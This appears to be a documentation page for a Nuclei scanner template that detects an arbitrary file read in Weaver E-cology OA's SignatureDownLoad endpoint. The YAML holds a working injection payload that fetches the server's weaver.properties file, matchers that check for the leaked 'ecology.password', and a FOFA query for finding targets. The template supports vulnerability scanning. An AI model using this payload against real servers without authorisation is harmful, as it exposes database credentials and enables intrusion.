OA E-Weaver SignatureDownLoad - Arbitrary File Read
ID: weaver-signaturedownload-lfi
Severity: high
Author: SleepingBag945
Tags: ecology,weaver,oa,lfi
Description
Section titled “Description”There is an arbitrary file reading vulnerability in the E-Weaver SignatureDownLoad interface of Panwei OA. An attacker can read any file on the server through the vulnerability.
YAML Source
Section titled “YAML Source”id: weaver-signaturedownload-lfi
info: name: OA E-Weaver SignatureDownLoad - Arbitrary File Read author: SleepingBag945 severity: high description: | There is an arbitrary file reading vulnerability in the E-Weaver SignatureDownLoad interface of Panwei OA. An attacker can read any file on the server through the vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Weaver%20SignatureDownLoad%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md classification: cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: weaver product: e-cology fofa-query: app="泛微-E-Weaver" tags: ecology,weaver,oa,lfi
http: - method: GET path: - "{{BaseURL}}/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27"
matchers-condition: and matchers: - type: word part: body words: - "DriverClasses" - "ecology.password" condition: and
- type: word part: header words: - "application/octet-stream" - "markPicture.jpg" condition: and
- type: status status: - 200# digest: 490a0046304402202af1a411022b90cdf59a87ab628247db670efcd27d9f67caf3070afd26cb41a302205aa6fcc7937586159bbcf4bb58420ea8bd7f24cd171ddc0f4c6f17ebe2bf51fa:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml"